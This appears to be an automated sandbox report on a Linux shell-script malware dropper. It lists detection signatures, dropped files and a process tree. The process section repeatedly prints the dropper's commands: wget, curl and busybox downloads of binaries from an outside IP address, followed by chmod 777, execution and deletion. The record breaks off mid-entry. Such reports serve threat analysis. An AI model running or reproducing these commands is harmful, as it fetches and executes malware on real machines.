Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-djtxtstbnd
Target edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
SHA256 edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc

Threat Level: Shows suspicious behavior

The file edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 03:02

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 03:02

Reported

2024-10-18 03:05

Platform

debian9-mipsel-20240611-en

Max time kernel

70s

Max time network

72s

Command Line

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A

Processes

/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

